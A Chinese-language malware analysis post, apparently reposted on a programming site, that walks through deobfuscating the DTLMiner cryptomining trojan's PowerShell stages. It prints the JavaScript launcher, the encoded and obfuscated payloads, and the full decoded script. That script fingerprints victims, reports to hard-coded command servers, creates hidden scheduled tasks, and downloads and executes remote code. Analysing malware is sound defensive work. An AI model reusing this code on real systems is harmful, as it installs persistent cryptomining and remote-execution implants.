内容简介:新版挖矿木马病毒快捷方式执行使用javascript 执行的该 javascript 代码从
新版挖矿木马病毒 DTLMiner
通过漏洞和弱口令攻击植入,创建快捷方式开机自启动
快捷方式执行使用javascript 执行的 flashplayer.tmp
文件内容如下:
try{(new ActiveXObject("WScript.Shell")).Run("powershell -w hidden -ep bypass -c while($True){try{IEX (New-Object Net.WebClient).downloadstring('http://v.bddp.net/ipc?dplow')}catch{Sleep -m 2500000}}",0,false);}catch(e){}
该 javascript 代码从 http://v.bddp.net/ipc?dplow
下载代码并使用 powershell 执行
访问链接内容如下:
Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('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')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
修改以上代码中的 Invoke-Expression
为 $code =
然后
$a | Out-File decodedStream.txt
解码后的代码会写入到 decodedStream.txt
内容如下:
& ( ([StRing]$veRbOSEpREFERENCE)[1,3]+'x'-JOIN'')( ((("{50}{52}{11}{63}{13}{15}{8}{64}{17}{3}{67}{69}{6}{79}{60}{16}{49}{43}{68}{25}{33}{14}{56}{21}{76}{73}{78}{37}{9}{54}{2}{46}{19}{81}{85}{1}{48}{82}{66}{45}{23}{28}{36}{55}{77}{61}{7}{41}{71}{5}{59}{39}{40}{75}{34}{29}{57}{72}{27}{10}{38}{58}{31}{26}{62}{53}{35}{30}{84}{74}{51}{4}{70}{80}{20}{22}{32}{42}{18}{65}{44}{83}{47}{24}{0}{12}" -f 'op-Process -Force -p','8s+(Get-WmiObject -Class Win32_OperatingSystem).version+u8s&bit=u8s+(Get-WmiObject Win32_OperatingSystem).','pArdflag = pArflase
New-Object System.Threading.Mut','gu8','rt-Process -FilePath cmd.exe -ArgumentList u8spAronpsu8s
}else{}
}catch{}
try{
if([IntPtr]::Size -eq 8){
pArdglink = u8s/c powershell -nop -w','u8s8qKMic','0-00-00-00u8s
}else{}
[System.Thr','ArText)
pArbcode = [Convert]::ToBase64S','3Obj','g = pArflase
New-Object S','code.GetB','pAravs = u8su8s
[string]pArmac = (getmac /FO CSVyuESelect-Object -Skip 1 -first 1yuE ConvertFrom-Csv -Header MACyuEselect-object -expand MAC)
pAravs = (Get-WmiObje','rocessname powershell
}else{}',' root8qKSecurityCenter2 -Class AntiVirusProduct).displayName
if(pAravs.GetType().name.Index','Aren','Of(gP','Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.','
}else{
pArav = pAravs
}
try{
if((Get-Service zhudongfangyu yuE Sort -Property Status).Status -eq u8sRunnin','net/d32.dat?allv6u8s + pArkey + u8sgP3)u8s + gP3u8sgP3
}
if(pArdflag){
','mat gP3','else{
pArdgli','[string]pArflag = test-path pArpath
pArpath2 = u8spArenv:temp8qK8qKk','nk = u8s/c powershell -nop -w hidden -ep bypas','+ pArenv:USERNAME + u8s&PS=u8s + pArpsflag
if(pArflag -eq gP3FalsegP3){','type file
St',' = u8','ershell -nop -ep bypass -e gP3 + pArbcode +gP3u8s /FgP3
&cmd.exe /c pArccc
}
}catch{}
}else{}
try{
pArdownload = gP3','::Uni','
New-Item pArpath -type file
try{','pAr','ownloadString(u8spArdownloadu8s)
}catch{}
try{
if(pArpsflag){
pAronps = u8s/c powershell -nop -w hidden -ep byp','u8s /tr u8spow','s -c u8s +','sp','s + pArdt + u8sgP3)u8s
','mmand.Definition
IEX (New-Object Net.WebClient).D','
if(pArpermit){
pArstatus += gP3PHigyuEgP','P3
pArpsfla','ytes(pArText)
pArbcode = [Convert]::ToBase64String(pArBytes)
pArccc = gP3schtasks /query /tn u8sgP3 + pArmac','P3u8s /FgP3
&cmd.exe /c pArccc
}else{
pArstatus +','= gP3PLowyuEgP3
pArText','tring(pArBy',' gP3u8sgP3 + u8sIEX (New-Object Net.WebClient).downloadstring(gP3u8s + u8shttp://down.bddp.','nist','
}else{}','ser=u8s ','ex (pArtrue,pArname2,[ref]pArdflag)
}catch{}
pArdt = Get-Date -For','rpath2 -','OSArch','Principal.WindowsBuiltInRole] u8sAdmi','[string]pArav = u8s','/down.bddp.net/newol.dat?allv6u8s + pArkey + u8sgP3)u8s + gP3u8sgP3
Sta','u8s
[string]','json?allv6gP3 + pArkey + u8s&u8s + pArstatus + u8s&u8s + pArMyInvocation.MyCo','ystem.Threading.Mutex (pArtrue,pArname,[ref]pArpsflag)
}catch{}
try{
pArname2 = gP3Global8qKpowerdv5gP3
','3
pArText = u8sIEX (New-Object Net.WebClient).downloadstring(gP3http://v.y6h.net/g?hu8s + pArdt + u8sgP3)u8s
pArBytes = [System.Text.Enco','v:temp8qK8qKkkk1.logu8s
','Bytes ',' + gP3u8s yuEyuE schtasks /create /sc MINUTE /mo 45 /st 07:00:00 /tn u8sgP3 + pArmac + gP3','rosoft8qKwindows8qKgP3 + pArmac + gP3u8s /tr u8spowershell -nop -ep bypass -e gP3 + pArbcode +g','ermit = ([Security.','de.GetBytes(p','http://27.102.107.137/status.','ct -Namespace','ectgP3) -gt -1){
for(pArv = 0; pArv -lt pAravs.Count; pArv++){
pArav += pAravs[pArv] + u8syuEu8s
}
',' Start-Process -FilePath cmd.exe -ArgumentList u8spArdglinku8s
','et-WmiObject win32_computersystem).Domain + u8s&u','s){
pArav += gP3','ratoru8s)
pArstatus = gP3yuEgP3
pArpath','ZDFYgP3
}
}catch{}
if(-not (pArmac -match gP3^[8qKda-fA-F-]*pArgP3)){
[string]pArmac = u8s00-00-0',' hidden -ep bypass -c u8s + gP3u8sgP3 + u8sIEX (New-Object Net.WebClient)','tes)
pArccc = gP3schtasks /query /tn u8s8qKMicrosoft8qKwindows8qKgP3 + pArmac + gP3u8s yuEyuE schtasks /create /ru system /sc MINUTE /mo 45 /st 07:00:00 /tn ','= [System.Text.Encoding]','
[string]pArflag2 = test-path pArpath2
try{
pArname = gP3Glob','3u8sgP3 + u8sIEX (New-Object Net.WebClient).downloadstring(gP3u8s + u8shttp:/',' = u8sIEX (New-Object Net.WebClient).downloadstring(gP3http://v.y6h.net/g?lu8','ill.logu8s
','ding]::Unico','al8qKpowerv5g','eading.Thread]::Sleep((Get-Random -Minimum 20000 -Maximum 400000))
pArp','.downloadstring(gP3u8s + u8shttp://down.bddp.net/d64.dat?allv6u8s + pArkey + u8sgP3)u8s + gP3u8sgP3
}','yyMMddgP3
','itecture + u8s&flag2=u8s + pArflag + u8s&domain=u8s + (G','
}catch{}
[System.Threading.Thread]::Sleep(3000)
if(pArflag2 -eq gP3FalsegP3){
New-Item pA','ass -c u8s + gP','
pArkey = u8s&mac=u8s+pArmac+u8s&av=u8s+pArav+u8s&version=u'))-crEplaCE([cHaR]56+[cHaR]113+[cHaR]75),[cHaR]92-crEplaCE 'u8s',[cHaR]34 -crEplaCE ([cHaR]112+[cHaR]65+[cHaR]114),[cHaR]36-crEplaCE 'gP3',[cHaR]39-RePlACE 'yuE',[cHaR]124) )
去掉 &
符号,在 ( ([StRing]$veRbOSEpREFERENCE)[1,3]+'x'-JOIN'')
前添加代码 $code =
, 后面添加 +
号,新添加一行打印 Write-Host $a
即可得到反混淆后的 powershell
代码
iex[string]$av = ""
[string]$avs = ""
[string]$mac = (getmac /FO CSV|Select-Object -Skip 1 -first 1| ConvertFrom-Csv -Header MAC|select-object -expand MAC)
$avs = (Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct).displayName
if($avs.GetType().name.IndexOf('Object') -gt -1){
for($v = 0; $v -lt $avs.Count; $v++){
$av += $avs[$v] + "|"
}
}else{
$av = $avs
}
try{
if((Get-Service zhudongfangyu | Sort -Property Status).Status -eq "Running"){
$av += 'ZDFY'
}
}catch{}
if(-not ($mac -match '^[\da-fA-F-]*$')){
[string]$mac = "00-00-00-00-00-00"
}else{}
[System.Threading.Thread]::Sleep((Get-Random -Minimum 20000 -Maximum 400000))
$permit = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
$status = '|'
$path = "$env:temp\\kkk1.log"
[string]$flag = test-path $path
$path2 = "$env:temp\\kill.log"
[string]$flag2 = test-path $path2
try{
$name = 'Global\powerv5'
$psflag = $flase
New-Object System.Threading.Mutex ($true,$name,[ref]$psflag)
}catch{}
try{
$name2 = 'Global\powerdv5'
$dflag = $flase
New-Object System.Threading.Mutex ($true,$name2,[ref]$dflag)
}catch{}
$dt = Get-Date -Format 'yyMMdd'
$key = "&mac="+$mac+"&av="+$av+"&version="+(Get-WmiObject -Class Win32_OperatingSystem).version+"&bit="+(Get-WmiObject Win32_OperatingSystem).OSArchitecture + "&flag2=" + $flag + "&domain=" + (Get-WmiObject win32_computersystem).Domain + "&user=" + $env:USERNAME + "&PS=" + $psflag
if($flag -eq 'False'){
New-Item $path -type file
try{
if($permit){
$status += 'PHig|'
$Text = "IEX (New-Object Net.WebClient).downloadstring('http://v.y6h.net/g?h" + $dt + "')"
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$bcode = [Convert]::ToBase64String($Bytes)
$ccc = 'schtasks /query /tn "\Microsoft\windows\' + $mac + '" || schtasks /create /ru system /sc MINUTE /mo 45 /st 07:00:00 /tn "\Microsoft\windows\' + $mac + '" /tr "powershell -nop -ep bypass -e ' + $bcode +'" /F'
&cmd.exe /c $ccc
}else{
$status += 'PLow|'
$Text = "IEX (New-Object Net.WebClient).downloadstring('http://v.y6h.net/g?l" + $dt + "')"
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$bcode = [Convert]::ToBase64String($Bytes)
$ccc = 'schtasks /query /tn "' + $mac + '" || schtasks /create /sc MINUTE /mo 45 /st 07:00:00 /tn "' + $mac + '" /tr "powershell -nop -ep bypass -e ' + $bcode +'" /F'
&cmd.exe /c $ccc
}
}catch{}
}else{}
try{
$download = 'http://27.102.107.137/status.json?allv6' + $key + "&" + $status + "&" + $MyInvocation.MyCommand.Definition
IEX (New-Object Net.WebClient).DownloadString("$download")
}catch{}
try{
if($psflag){
$onps = "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.bddp.net/newol.dat?allv6" + $key + "')" + '"'
Start-Process -FilePath cmd.exe -ArgumentList "$onps"
}else{}
}catch{}
try{
if([IntPtr]::Size -eq 8){
$dglink = "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.bddp.net/d64.dat?allv6" + $key + "')" + '"'
}else{
$dglink = "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.bddp.net/d32.dat?allv6" + $key + "')" + '"'
}
if($dflag){
Start-Process -FilePath cmd.exe -ArgumentList "$dglink"
}else{}
}catch{}
[System.Threading.Thread]::Sleep(3000)
if($flag2 -eq 'False'){
New-Item $path2 -type file
Stop-Process -Force -processname powershell
}else{}
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
The Little Prover
Daniel P. Friedman、Carl Eastlund / The MIT Press / 2015-7-10 / USD 38.00
[FROM www.amazon.com]: The Little Prover introduces inductive proofs as a way to determine facts about computer programs. It is written in an approachable, engaging style of question-and-answer, wi......一起来看看 《The Little Prover》 这本书的介绍吧!
